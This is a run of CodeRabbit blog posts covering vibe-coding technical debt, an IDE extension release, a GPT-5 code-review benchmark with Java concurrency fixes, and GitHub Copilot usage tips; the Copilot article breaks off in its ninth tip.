tackle the technical debt before it solidifies in your codebase. ## **We’re not losing the craft — we’re drowning it in debt** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/563cc8f7a53cc72f496756d8a69291960c1c505351f03e5cde26ab858f5a4a01_c0090f32d8.png) The biggest risk isn’t that AI kills developer craftsmanship. It’s that **technical debt becomes invisible**. As AI coding becomes the default way to build, systems will *look* complete — but underneath, they’ll be messy, fragile, and undocumented. And no one will know until they try to extend them. This matters *a lot* in domains like: * Healthcare * Finance * Infra * Safety-critical systems However, there’s also a chance that vibe coding evolves into a new layer of development, one that coexists with craftsmanship, where AI handles the tedious things like boilerplate and first-pass code reviews and humans focus on the architecture, ethics, and design behind systems. ***That’s*** the timeline we want to find ourselves in and how we’re approaching AI at CodeRabbit. We’re focused on AI tools that supplement your coding agents by helping you find and prevent technical debt and bugs from making it into production – rather than the other way around. ## **To vibe code or not to vibe code?** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0803217a8d7664f297fd1af34b4cf992ce0520d09282962939e3224b25eff142_54ade5d7a2.png) This isn’t an anti-vibe coding article. I’m using AI coding agents in my workflow every day. But tools should amplify our skills, not replace them. They should do the work that’s tedious and repetitive – not the thinking and strategy. Vibe coding isn’t evil, it’s just easy to misuse. The real danger is letting it become the default mindset on your project before the developers on your team understand what they’re building. Let’s embrace AI, but keep coding as a craft alive, because good software isn’t just about what works. It’s about what lasts, long after the original dev has gone — and long after the vibes have faded. ***Need help keeping tech debt out of prod? Try our*** [***AI code review tool free today.***](https://app.coderabbit.ai/login???free-trial)

Code with AI, review with CodeRabbit’s IDE extension, apply fixes in one click

Edgar Cerecerez — Wed, 13 Aug 2025 00:00:00 GMT

The VS Code extension we launched back in May has been a game changer for many reasons – but the main one is it allows you to keep the state of flow by coding and reviewing in the same place; your IDE. With this latest release, we've added: * **Ability to send prompts to AI coding tools.** You can code with your favorite AI coding assistants, get intelligent reviews from CodeRabbit, and apply all suggested changes with the provided prompts - all without leaving your IDE. * **One-click acceptance of suggested changes.** Our most requested feature. Apply every suggestion at once instead of clicking through them individually. * **Full context awareness.** The same level of context awareness that CodeRabbit's PR reviews benefit from is now taken into account for users with Pro accounts. That means code reviews in the IDE now utilize [Learnings](https://docs.coderabbit.ai/integrations/knowledge-base#learnings%E2%80%8B), run code quality and code security tools, and adhere to agent Code Guidelines. * **More integrations.** Integrations with Codex CLI, Cline, Roo, Kilo Code, Augment Code. * **Ability to give feedback**. You can also provide feedback on each suggestion. That means you can review code, just like a human PR reviewer would, in the IDE – and then quickly apply those changes with the help of CodeRabbit or your AI coding tools. Before you even make a pull request. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/bfdcfeed2b10a3fe60e76b94aab31811176b77d2e9bfb90ca9e199180d05bbcb_966cba384a.jpg) ## **What that means for you** This has several great benefits: * **It improves the iteration loop.** You can code with AI, get feedback with CodeRabbit's AI reviews, and also, apply all suggested changes quicker than before. * **Cleaner PRs**. PRs can be saved for any stray issues and for human reviews. * **You look better.** Why ship error-filled code to your boss and team if you don’t have to. CodeRabbit’s IDE reviews are a great way to double check your code before you merge request. And now, they’re even easier. We hope this will improve the speed at which you ship – and help ease the burden of PR reviews as a whole. ## **Future roadmap** * **User-level Learnings:** We’ll be adding the ability to add Learnings or provide feedback on suggestions, so our agent automatically learns which suggestions you like and dislike. We currently have org-wide Learnings in the SCM but want to extend this feature to individual developers who want to add custom Learnings that will only apply to them. * **Web Queries:** We plan to integrate our context enhancing features into our IDE tool so your code is bug-free with fewer false positives and your reviews are always up-to-date on versions, library documentations and vulnerabilities, even if the LLM isn’t. * **Docstrings**: Want to create Docstrings before you merge? We’ll be adding this feature that’s currently part of our PR reviews to our IDE reviews in the future. A reminder: Our IDE reviews are free (with rate limits). [Download](https://coderabbit.link/2GbsyI9) the VS Code extension.

Benchmarking GPT-5: Why it’s a generational leap in reasoning

Christopher Cassion — Thu, 07 Aug 2025 00:00:00 GMT

The wait is over! As the leading AI code review tool, CodeRabbit was given early access to OpenAI’s GPT-5 model to evaluate the LLM’s ability to understand, reason through, and find errors in complex codebases. As part of our GPT-5 testing, we've conducted extensive evals to uncover its technical nuances, capabilities, and use cases with a focus on the model’s ability to understand and reason through potential issues and bugs in codebases. Below, you’ll find a breakdown of our structured evaluation approach, detailed findings relative to other popular models, and how we’re planning to incorporate GPT-5 into your AI code reviews to make them even better. ## TL;DR: The results ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0d423125ac6e13bd04e8f57cc538b1a54ec7ac26efe7cf9d0f706d6ffa12946a_fbbb66650b.png) * GPT-5 outperformed Opus-4, Sonnet-4, and OpenAI’s O3 across a battery of 300 varying difficulty, error-diverse pull requests. * GPT-5 scored highest on our comprehensive test and found 254 out of 300 bugs or 85% where other models found between 200 and 207 – 16% to 22% less. * On our 25 hardest PRs from our evaluation dataset, GPT-5 achieved the highest ever overall pass rate (77.3%), representing a **190% improvement over Sonnet-4**, **132% over Opus-4**, and **76% over O3**. ## How we evaluated GPT-5 ![](https://victorious-bubble-f69a016683.media.strapiapp.com/dc5371399f75edd8f3b69ff722562226b58cb568f53592c43e1cf4d95e4a88d6_fba24c2b32.png) We ran the same tests we run on all our models. These evals integrate GPT-5 into our context-rich, non-linear code review pipeline to see how it would perform in a typical code review. CodeRabbit's evaluation process includes: * **LLM-based judging:** We perform dual-layered LLM-based judgment that looks at both qualitative and quantitative data such as the quality of a review and a pass/fail of the model’s accuracy. * **Human-based judging:** We then perform qualitative checks by humans to verify the quality of review comments and depth of the model’s reasoning. * **LLM-based metrics collection:** We collect metrics that we believe are indicative of a high quality code review and weigh them by their importance. These metrics include: * Actionable comment counts * Readability scores (Flesch Reading Ease score) * Average word count * Sentence count * False positives (hallucinations) **Note:** Our evaluations were conducted on various ‘snapshots’ of GPT-5 that OpenAI shared with us leading up to the release of GPT-5. While our results changed somewhat with different snapshots, their relative consistency allowed us to make the observations below. The released model might be slightly different. ## GPT-5 capabilities: Evaluation results and analysis Our evaluation of GPT-5’s capabilities found that the model certainly lives up to the hype. GPT-5 outperformed all other models we’ve tested on our datasets – by a lot. ### Comprehensive evaluation scores GPT-5’s weighted score from our comprehensive evaluations was **between 3465 and 3541** on different test runs – which is almost 200 points above OpenAI’s O3 model and Anthropic’s Sonnet 4, which were previously our highest scoring models. The maximum possible score is 3651. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b3f3cb080cecaf493e2bbac857ba8016ae284e066a0f9068c2a01f03a4159902_a541da0283.png) Full evaluation scores: * GPT-5: 3465–3541 * O3: 3288 * Sonnet-4: 3242 * Opus-4: 3170 **Takeaway:** While a 200 point or 5% increase might not seem significant, the way our tests work is that models initially rack up points finding low-hanging fruit like infinite loops and exposed secret keys. After a point, it then becomes progressively harder to get points since all the remaining points come from flagging much harder to find issues. GPT-5’s ability to get so many more points than other models, therefore, represents a significant leap forward in reasoning. ### Pass/fail scales We also give models a pass/fail score based on how many of the 300 error patterns in our dataset PRs the model was able to find. GPT-5 also achieved the highest success rate on this scale that we’ve ever seen at **254 to 259 out of 300.** Compare that to the performance of other models: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/5eb073eebdb84dc69d214b4785a12bc3e81941a1bcb4b44a90327770aaaaa289_1e99ea52ad.png) * GPT-5: 254-259 * Sonnet-4: 212 * O3: 207 * Opus-4: 200 Since about 100 of the bottom PRs are found by all models, if we just look at the most difficult 200 error patterns, the numbers show even greater improvement with GPT-5 catching 78% of those error patterns and other models catching only 54% to 58%. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/8877254cea5e8e3b2d12d62247d3486498727e13e49c1917c1428ee79ff6ae26_f5830c0a74.png) * GPT-5: 157 * Sonnet-4: 117 * O3: 113 * Opus-4: 108 **Takeaway:** Similar to our comprehensive metric, the additional error patterns that GPT-5 was able to find are particularly hard for LLMs to spot, like concurrency bugs or inconsistent domain keys across environments, suggesting the model’s increased ability to reason. ## Hardest PRs test To stress-test each model, we curated 25 of the most difficult pull requests from our Golden PR Dataset. These PRs represent real-world bugs that span: * Concurrency issues (e.g. TOCTOU races, incorrect synchronization) * Object-oriented design flaws (e.g. virtual call pitfalls, refcount memory model violations) * Performance hazards (e.g. runaway cache growth, tight loop stalls) * Language-specific footguns (e.g. TypeScript misuses, C++ memory order subtleties) Each model was tested across three runs. Below is the **average pass rate** on this Hard 25 benchmark: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e66f367a5f31c4b6b61257209a5d38b1752471f4078aa25afe3138468a037268_dd91ebefcd.png) ### Pass rate chart | **Model** | **Mean Pass Rate (%)** | | --- | --- | | Sonnet-4 | 26.7% | | Opus-4 | 33.3% | | O3 | 44.0% | | **GPT-5** | **77.3%** | **Takeaway**: GPT-5 shines where accuracy, contextual linkage, and depth matter most. It consistently delivers **the most complete, test-ready, and forward-compatible code review output** among all models we’ve tested to date. ## **How many kinds of bugs does GPT-5 actually catch?** To better understand ***what kinds*** of issues each model identifies—not just how many—our team reviewed every comment across a set of hard PRs and classified them into categories like **Concurrency**, **Security**, and **Object-Oriented Design**. We applied **deduplication** across models: if multiple models flagged the same core issue (even if phrased differently), it was counted only once per PR. This ensured we were measuring **issue coverage**, not comment verbosity. Then, for each model, we tallied what percentage of those unique issues it successfully caught. ### **Takeaway:** * **GPT-5 leads in almost every category**, identifying **over 60%** of concurrency, performance, and memory bugs — and an impressive **80%** of security issues. * **Security remains the most striking gap**: GPT-5 found 80% of security-related bugs, while the next best model (O3) found only 40%. * Even on basic concurrency and performance problems, GPT-5 consistently outperforms by 20-30 points. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/42a77c378abd404ac3767bbd3a41c31ca786b8377c895c39bb19608579e8711e_74701ded66.png) ## **Example: GPT-5 uncovers hidden concurrency risks missed by others** In this pull request, a subtle concurrency bug stemmed from a combination of **double-checked locking** and **unsafe access to a shared** `HashMap` in a singleton service class. While most models flagged the obvious thread-safety issue, GPT-5 delivered a comprehensive, production-ready fix—resolving not just the symptom, but the architectural flaws underneath. ### **The problem** The `OrderService` singleton used a `HashMap` to store orders, while concurrent updates were made from a fixed thread pool. This design lacked synchronization, leading to potential data corruption. On top of that, the singleton was initialized using a non-volatile static field—opening the door to **unsafe publication** and partially constructed objects. ### **GPT-5’s recommendations** GPT-5 went beyond the basic fix and stitched together a complete concurrency hardening plan: ### **1\. Replace the map with a thread-safe alternative** ```plaintext - private final Map orders = new HashMap<>(); + private final Map orders = new ConcurrentHashMap<>(); ``` ✅ GPT-5 also explained why: “Concurrent updates... are executed on a plain HashMap... not thread-safe and can lead to undefined behavior.” --- ### **2\. Fixed the broken singleton instantiation** ```plaintext - private static OrderService instance; + private static volatile OrderService instance; ``` Or optionally: ```plaintext private static class Holder { private static final OrderService INSTANCE = new OrderService(); } public static OrderService getInstance() { return Holder.INSTANCE; } ``` ✅ It flagged the classic memory visibility issue with double-checked locking and offered an alternate pattern to make construction thread-safe. --- ### **3\. Added a test reset hook to prevent state leakage** ```plaintext // Inside OrderService.java void clearAllForTest() { orders.clear(); } ``` ✅ This enables isolated, repeatable tests when working with a shared singleton across multiple test cases. --- ### **4\. Added timeouts to catch async test hangs** ```plaintext - future.get(); // Wait for completion + assertTimeoutPreemptively(Duration.ofSeconds(5), () -> future.get()); ``` ✅ GPT-5 proactively hardened the test suite by guarding against test flakiness in asynchronous flows. --- ### **What Sonnet-4 and Opus-4 missed** Both models correctly flagged the unsynchronized `HashMap` and replaced it with `ConcurrentHashMap`. However, neither delivered a complete or production-safe remediation: * ❌ **Singleton issues unresolved**: Sonnet-4 ignored the broken double-checked locking; Opus-4 mentioned it but skipped the actual fix (no `volatile`, no `holder` idiom). * ❌ **No test safety provisions**: GPT-5 introduced `clearAllForTest()` and timeout guards; Sonnet-4 and Opus-4 missed these entirely or only noted them passively. * ❌ **Lacked architectural context**: Neither model cross-referenced the broader codebase or justified changes with evidence. GPT-5 backed each fix with reasoning that traced across services, tests, and threading behavior. * ❌ **Limited scope**: Sonnet-4 made a single, surface-level fix. Opus-4 added some useful logging but missed the deeper structural risks GPT-5 fully addressed. --- ### **Why this matters** The real value of GPT-5’s review lies in its **depth and awareness**. It not only patched the visible race, but also: * Identified deeper architectural risks * Cross-referenced test reliability and code quality * Delivered a set of changes that are *safe to merge immediately* **This isn’t just a fix—it’s engineering insight.** GPT-5 showed how an AI reviewer can reason across system layers, suggest durable solutions, and help teams write safer code with less guesswork. ## **What’s new (and exciting) about GPT-5** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/8ade25673f150f2b2699d71a18f124853e413d061b3f73f98f1695b7efde0955_348fc54245.png) Beyond metrics and the specific things our tests were evaluating, we found that GPT-5 exhibited new behavioral and reasoning patterns. * **Advanced contextual reasoning:** GPT-5 proactively planned multiple review steps ahead, showcasing expansive creative reasoning rather than strict input-bound logic. For example, GPT-5 demonstrated deep reasoning by connecting evidence across filles in our Concurrency oriented test focused on a ‘Check-then-act race condition’ scenario. It was the only model to detect risk of duplicate creation and introduced an atomic refund pattern grounded in the enum and test suite. * **Chain-of-thought reasoning via review threads**: In an Object-Oriented test focused on a Virtual call in constructor case, GPT-5 showed layered logic by first identifying a misused polymorphic override and then adjusting its recommendations based on its own earlier suggestions. This shows layered logic by identifying one thing and then showing additional reasoning on the issue later. * **Evidence-based diff justification**: In a Performance-focused test focused on Unbounded cache growth (no eviction) issue, GPT-5 identified architectural memory risks that other models missed, and backed its recommendation with diff context, usage patterns, and suggested safeguards. * **Forward-thinking suggestions**: In a Concurrency-related test focused on Incorrect sync primitive usage, GPT-5 not only patched the race but also suggested how to structure future additions, lock hierarchies, and test guardrails to prevent regressions. * **Granular, task-oriented recommendations:** Unlike previous models, GPT-5 detailed explicit follow-up tasks, creating actionable workflows within the review process itself. This makes the model much better for multi-step workflows. ## How we’re using GPT-5 in our AI code reviews We’re excited that GPT-5 represents a significant advancement in AI-powered code review, pushing the boundaries in detail, accuracy, and contextual reasoning. That’s why we’ll be using GPT-5 as the core reasoning model in our pipeline – starting today. We’re excited that it will be able to find more issues and create more in-depth, context-rich reviews. If you’ve never tried CodeRabbit, tried it previously, or are a current user, we’d love to hear how you think GPT-5 is improving your review quality and experience. ***Try our*** [***free 14-day trial today***](https://coderabbit.link/i72LrCC) ***to see the power of GPT-5 yourself.***

GitHub Copilot best practices: 10 tips & tricks that actually help

Ankur Tyagi — Wed, 23 Jul 2025 00:00:00 GMT

Copilot has quickly become a staple in the modern developer’s toolkit. Powered by OpenAI’s models, it offers AI-driven code suggestions based on what you’re writing — right in your editor. Used well, it can significantly boost productivity. Microsoft’s data suggests it may help developers [code up to 55% faster.](https://github.blog/news-insights/research/research-quantifying-github-copilots-impact-on-developer-productivity-and-happiness/) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/86528bb7dbf8ea8e1fff678ff998160e18fcd5cef17a07c9e8528ae8ecebf85e_66a82275f7.png) But here’s the catch: **Copilot isn’t a magic wand**. Left on autopilot, it can feel more like an eager junior dev making confident guesses than a reliable coding partner. The difference between a helpful Copilot and a frustrating one often comes down to how you use it — and whether you’ve built a workflow that plays to its strengths. In this article, we’ll walk through how Copilot fits into the broader [AI dev tool stack](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack) and share practical GitHub Copilot tips and tricks for using it more effectively. These strategies are drawn from both our own experience and the thousands of developers using CodeRabbit’s AI code review platform. With the right approach, Copilot can go from a neat autocomplete toy to a genuinely valuable part of your daily development routine. ## GitHub Copilot tip 1: Play to Copilot’s strengths Not every coding task is equal in Copilot’s eyes. One of the most important GitHub Copilot best practices is to use it where it shines, not force it to create code where it doesn’t. Copilot excels at specific categories of tasks that can save you significant time. Copilot is especially good at… * Writing *repetitive code* * Generating *unit tests* * D*ebugging syntax issues* * E*xplaining code* * G*enerating regex patterns* These are areas where it has seen lots of examples and can confidently suggest solutions. For example, if you have a function and need to write several tedious unit tests for it, Copilot can draft them in seconds. Consider this simple function and tests:

def multiply(a, b):
"""Return the product of a and b."""
return a * b

Copilot can help create unit tests for the above function quickly: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a020ae014359b847fab9113d7858bb6d9a7e259e48548cea9dd7c9850a038aaa_c2aea7c5a7.png) In a scenario like the above, Copilot generated the **TestMultiply** class almost entirely from a comment or prompt. It’s excellent for boilerplate code, repetitive patterns, and well-defined algorithms. On the flip side, Copilot is **not** a silver bullet for everything.It’s not designed to handle tasks unrelated to coding (don’t expect it to plan your database schema or design UI work) and won’t replace your problem-solving skills. Think of Copilot as a junior developer at your side. It’s fast and often right about everyday tasks, but you (the senior developer) are still in charge of decision-making and critical thinking. Use Copilot for the “heavy lifting” on mundane code and let it suggest solutions for routine problems, but always apply your judgment on whether to use those suggestions. That way, you’ll save time and reduce drudgery while keeping yourself focused on the challenging problems and design decisions. ## **GitHub Copilot tip 2:** Provide ample context (open files, set imports, etc.) A **hot tip for GitHub Copilot** is to open all the relevant files in your project when you’re coding a particular feature. That’s because Copilot works by looking at the context in your editor to predict what you might want next. The more relevant context you give it, the better the suggestions. For instance, if you’re implementing a function in **utils.py** that interacts with **models.py**, have both files open. Copilot will process all open tabs (often called “neighboring tabs”) to inform its suggestions. This broader view helps it understand your project structure and produce more accurate code. In fact, simply opening related files in VS Code or your IDE can significantly enhance Copilot’s completions by providing extra context for definitions and usages across your project. Similarly, explicitly set up your imports, includes, and dependencies before expecting the best suggestions. You know what libraries or frameworks you intend to use – tell Copilot by importing them at the top of your file. This gives Copilot a heads-up on what tools it should use. It’s often best to manually add the modules or packages (with specific versions, if needed) before asking Copilot to generate code using them. By doing so, you avoid Copilot defaulting to an outdated library or missing an import. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/7f4a376d7d63eacef325d8fe5aafacc00fe892367628a86a2d05b180946ed4f0_a57f1fa921.png) **For example**, if you plan to use **pandas** in your code, write **import pandas as pd** yourself; then when you ask Copilot to manipulate a DataFrame, it will already know to use pandas and won’t attempt a pure-Python solution or an incorrect import. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e6813bfa6b55d4302598e2cf571b8ae0c1d3b84a57b311c66deb753d84353b90_e77d6ff97d.png) Also, be mindful of irrelevant context. Copilot’s window of attention is limited. If you have a lot of unrelated files open or leftover code in your editor, close or remove them when you switch tasks. Keeping only the pertinent files and context visible ensures Copilot isn’t “*distracted*” by code that doesn’t matter to your current goal. ## **GitHub Copilot tip 3:** Write descriptive comments and docstrings as prompts You understand prompt engineering when you’re directly calling an LLM. But did you know that there are some sneaky ways to prompt engineer in Copilot? One of the most effective GitHub Copilot tips is to guide the AI with natural language comments. Think of writing comments as a form of *prompt engineering*. Before you write the code, describe in plain English (or your preferred language) what you intend the code to do. **For example**, we want a function to sort a list of names case-insensitively. We might start with: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f2175b371db1bffd142060c3ef4c7917f8548a906999484c6704e4541a94755e_d98dee5958.png) The moment you write that comment and pause, Copilot will likely suggest the rest of the function (e.g., using sorted(names, key=str.lower)). A top-level comment at the start of a file, or a docstring/comment above a function, helps Copilot understand the overarching objective before diving into implementation details. This process is similar to giving a human colleague a quick overview of the task at hand, it sets the stage so the following code makes sense in context. When writing these comments, be clear and *specific* about the desired behavior. Mention any requirements or constraints. For a more complex example, suppose you need a function to format a person’s name as **"LASTNAME, Firstname"**. You could provide an example in the comment to clarify your intent: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/11cdb380225ad755b7cd7402514946cb691cb4701a3707c56f5ce35182fdbdb4_92ef0360a6.png) By including the example of input and output, you give Copilot a crystal-clear idea of what you want. Which is exactly the desired solution. The first comment was a prompt describing the goal and even provided a test case, and Copilot filled in the implementation. **Use this technique liberally.** Add a brief docstring or comment for each function describing *what* it should do (and how at a high level, if you have an approach in mind). Copilot can detect the comment syntax for your language and will often even help complete the comment if it recognizes a pattern (for example, it might suggest a template for a Python docstring). By writing specific, well-scoped comments before the code, you essentially “program” Copilot with your intent. **Remember the old saying**: garbage in, garbage out. If you feed Copilot an ambiguous comment like “# do something with data”, you’ll get ambiguous code. Instead, describe the task clearly – *“# Calculate the average value from a list of numbers, ignoring any nulls”* and watch Copilot more reliably produce the correct logic. ## **GitHub Copilot tip 4:** Use meaningful names for clarity You might hate being stickler about style but variable and function names are another form of context that Copilot relies on. A tip that might seem obvious but is often overlooked is to**give your functions and variables meaningful, descriptive names**. If you have a function named **foo()** or variable **data1**, Copilot has virtually no clue what you intend, beyond what it can infer from a possibly sparse usage context. In contrast, names like **calculate\_invoice\_total()** or **user\_email\_list** immediately convey intent to humans and the AI. In fact, Copilot’s suggestions will improve dramatically when your code is self-documenting. A function called **fetchData()** doesn’t mean much to Copilot (or to a coworker) compared to a function named **fetch\_airport\_list()** or **get\_user\_profile**. The latter gives far more hints of what the function should do. **For example**, consider these two scenarios: **Vague naming:**

# Determine if a user is eligible for promotion
def check(user, data):
# ...

With a function name like check and a parameter data, Copilot might struggle. “Check” could mean anything. Could it check a password or a value in data? Its suggestions might be generic or incorrect because it’s guessing your intent. **Descriptive naming:** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/5f6103fc9e36f5c52cd09dbd485d3a946e26ecc38296ae1b7ef145f73331e5b5_ede2953a79.png) The function name **is\_user\_promotable** clearly signals a boolean decision, and the parameters **user\_profile and promotion\_rules** indicate the data involved. Copilot can use this information to guess that you might iterate over rules, check user attributes, etc., and its completion will align with that logic. Adopting clear naming conventions isn’t just a general coding best practice for developers. It’s a GitHub Copilot best practice, too, because Copilot can only infer intent from what it sees. If what it sees are meaningful identifiers and not cryptic ones, it will return far more relevant code. This tip also pays dividends for code maintainability – since you’ll get better AI suggestions *and* cleaner code for your team. ## **GitHub Copilot tip 5:** Pair Copilot with CodeRabbit for AI-assisted code reviews While Copilot is fantastic during the coding phase, what about after you’ve written your code? Enter CodeRabbit, an AI-powered code review developer tool that complements Copilot in the development workflow. CodeRabbit acts like an AI “pair reviewer,” scanning your code (either in the [IDE](https://www.coderabbit.ai/ide) or on your [Git platform](https://docs.coderabbit.ai/platforms/github-com)) and providing feedback and suggestions for improvement. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/27be2d10c3a4399dd4b6e56ab552ecff38079a423dd11a9e783500b03936acb6_a7e0fde34e.png) We’ve found that using Copilot and CodeRabbit together creates a powerful feedback loop: Copilot helps you generate code quickly and CodeRabbit helps ensure that code meets quality standards before it gets merged. * You don’t get the developer who wrote the code to review it, so why get the same AI system to do so? * An AI code reviewer also allows you to standardize your quality gate if your team is using multiple AI coding agents – as so many teams are these days. * Finally, purpose-built AI coding agents like CodeRabbit do a more thorough job and have more features that means the average user is able to find 50% more bugs in half the time they’d typically spend on a code review. CodeRabbit integrates into VS Code and pull requests on platforms like GitHub. In your IDE, you can invoke CodeRabbit to review the file or the diff you’re working on. It will directly add AI-powered inline review comments in the code, pointing out potential issues, much like a [human reviewer](https://www.devtoolsacademy.com/blog/ai-code-reviewers-vs-human-code-reviewers/) would. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e46b25ec4fd9587c21a00333405fa2aa273648aeedc28eac53d0869210d93811_ab7692f844.png) **For example**, CodeRabbit might flag that your function lacks error handling for a specific edge case or suggest a more appropriate HTTP status code. On GitHub or GitLab, CodeRabbit can automatically comment on PRs with its findings, saving human reviewers time by catching obvious problems first. It also provides line-by-line code reviews, highlighting possible bugs, code smells, style issues, or even missing unit tests. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d1e844f97a52b3aa8628169bd4dcea57a1d15b72a6c8380af79bb1a4cad57411_fa2e26814e.png) ### How best to use Copilot and CodeRabbit together Think of Copilot and CodeRabbit as two halves of a complete AI-assisted development cycle. You use Copilot while writing code to speed up implementation. Then you use CodeRabbit to review that code and catch anything Copilot (or you) might have missed. * Copilot might generate a solution that works but isn’t optimal and CodeRabbit could point out a performance issue or a more idiomatic approach. * Copilot might not know your project’s specific coding standards, but CodeRabbit can enforce them during review. Perhaps your team prefers format() over f-strings, etc.. CodeRabbit can comment on that. * Copilot might help you quickly whip up a new API endpoint, CodeRabbit could then run and immediately warn, *“Hey, you didn’t handle the case where this input is null,”* or *“This SQL query might not be parameterized.”* You can address those before your human colleagues even look at the code. Essentially, Copilot gets you to a working draft faster, and CodeRabbit gives you confidence to ship it by auditing the code. It’s like having an AI pair programmer and an AI code auditor working together. In the context of a [complete AI dev tool stack](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack), Copilot and CodeRabbit cover a lot: Copilot for coding, CodeRabbit for review, and you might even use other AI tools for testing or security. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c25e6af29fb5100ced040f89b64954e2cfc677eaaf4280ce10f34bd287f2a4c7_1413ae1101.png) To get started, [you can install CodeRabbit’s IDE extension](https://marketplace.visualstudio.com/items?itemName=CodeRabbit.coderabbit-vscode) or add it to your GitHub repository as a [GitHub App from the marketplace](https://coderabbit.link/j4daQIo). We highly recommend this for teams and there’s even a [14-day trial.](https://coderabbit.link/ZboRIZI) ## **GitHub Copilot tip 6:** Be specific and provide examples in prompts When it comes to guiding an AI model, specificity is king. If you’re asking Copilot to write code to transform data, consider providing a short example of the data format in a comment or docstring. If you want a function to calculate something, state the formula or an example scenario in natural language. Copilot’s underlying model is essentially trying to predict what a knowledgeable developer would write next. If your prompt (context + comments) is vague, the model must guess and may go wrong. But if you spell out details and even including sample inputs and outputs if possible, that helps For instance, suppose you need to parse a log line like **"2025-06-02 09:00:00 - ERROR - failed to connect"**. Instead of just writing **\# parse log line**, you could write: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/9325adc9c97184fae4dddb9f8e234c6a3f69e2e6c5e12671ea957423436a3839_1bb2f9b71a.png) This specific prompt gives Copilot a clear blueprint: it knows the log format and the desired output types. With the example shown, the chances of Copilot writing a correct **parse\_log\_entry** implementation (splitting by " - ", parsing the date with **Datetime, strptime**, etc.) are much higher. Without the example, Copilot might misidentify the format or split incorrectly. When prompting Copilot for non-trivial code, spell out the details. If a function has constraints (e.g. “input can be null” or “assume list is sorted”), mention them. If there’s a particular approach you want (e.g. “use binary search” or “use recursion”), hint at it in your comment. And if possible, provide a quick example. The model will take these as strong cues and align its suggestions accordingly. ## **GitHub Copilot tip 7:** Break complex tasks into smaller steps Copilot works best when it’s dealing with a focused, well-defined task. If you ask it to do too much at once, you might get a muddled or incomplete answer. A great strategy is to break down big problems into bite-sized pieces and tackle them one by one with Copilot’s help. **For example**, imagine you need to implement a complex algorithm. Instead of prompting Copilot to write the whole thing in one go (which might result in a long, confusing blob of code), start by outlining the high-level steps as comments or pseudocode. You might write a few lines of comments or stub functions and then let Copilot fill in each part. Generate code incrementally, rather than all at once. This approach makes Copilot’s job easier (each step has more specific context). That makes it easier for you to review and trust the code at each step. Let’s say you’re building a small command-line program. First, prompt Copilot to parse command-line arguments, then separately prompt it to implement the business logic, then prompt it to handle output. You can check Copilot’s work at each stage by breaking the flow. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/4bcc6b81efaa9ce18002eae07042cae8e41677407fb2c4189b718c43bcb82f91_2ad789bd09.png) Think of Copilot as participating in a step-by-step refinement of your code. So, don’t try to have Copilot write an entire module in one shot. Instead, have it write one function at a time, or even one logical block at a time, especially if the logic is intricate. By decomposing tasks, you also naturally create opportunities to review each piece. This incremental approach leads to better quality code and fewer surprises. It’s much easier to debug a smaller Copilot suggestion than the 50-line monolith it spit out because you asked a very broad question. ## **GitHub Copilot tip 8:** Leverage Copilot Chat vs inline completions wisely **GitHub Copilot has two primary flavors –** traditional inline code completion and the newer [Copilot Chat](https://docs.github.com/en/copilot/using-github-copilot/copilot-chat) (an interactive chat interface available in VS Code, Visual Studio, and other environments). Knowing when to use Copilot Chat vs when to rely on inline suggestions can make a big difference in your workflow. It’s one of those subtle hot tips for GitHub Copilot that can transform how you approach a problem. **Inline code completions** (the original Copilot experience) are best for: * **In-the-flow coding assistance:** When you’re writing code and want Copilot to suggest the next line or block as you type. This works great for completing a small algorithm, filling in a loop, or writing boilerplate in place. * **Filling in repetitive code or simple patterns:** For example, generating a quick data class, an API call, or the next cases in a series of if/elif conditions. The inline suggestions excel at continuing your current context. * **Generating code from a commented intent:** as we’ve seen, if you write a comment # do X, the inline completion often does X immediately in code form. On the other hand, Copilot Chat is more powerful when you need more interaction or have questions about your code: * **Explaining or analyzing code:** You can ask Copilot Chat *“What does this function do?”* or *“Why am I getting a KeyError here?”* and get a natural language answer. The chat can act like a super-smart rubber ducky for debugging. * **Larger code generation tasks with iteration:** If you want to generate a sizable chunk of code (say a whole function or class) and then refine it, Copilot Chat is ideal. You might ask it to write the code, then say, “now optimize this” or “can you refactor that part using a dictionary instead of if-else?” This back-and-forth is something inline suggestions can’t do easily. * **Using personas or specific commands:** Copilot Chat has a concept of *keywords and skills* (and allows system-level instructions like “Act as a senior developer…”) which you can use to influence its style or thoroughness. For instance, you could instruct it to be security-conscious when writing the code. To illustrate, if I have a piece of code and I’m not sure it’s efficient, I might use Copilot Chat: *“Explain the complexity of this function. How can I improve it?”* Copilot Chat might identify the bottleneck and even suggest a more efficient approach. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/55ab18ed5d8a2c3f4f6e0f3cc1c144c606d75beeb7d54ec8b16eb92fde1a1707_bd4d22969d.png) On the other hand, if I just need the next few lines of a loop, inline completion is faster. I can just hit Tab and keep coding. **Tip:** If you have access to both, don’t forget you can use them together. Maybe start writing a test function (inline completion helps you fill out test cases), then switch to Chat to ask Copilot to generate some additional tests or explain a failing test. Each tool has its sweet spot. ## **GitHub Copilot tip 9:** Cycle through suggestions and refine your prompts By default, Copilot might show you one suggestion – the most likely completion – for your prompt or code context. But what if that suggestion isn’t what you want? Many users forget that Copilot usually has **multiple suggestions** under the hood. Don’t settle for the first thing it offers 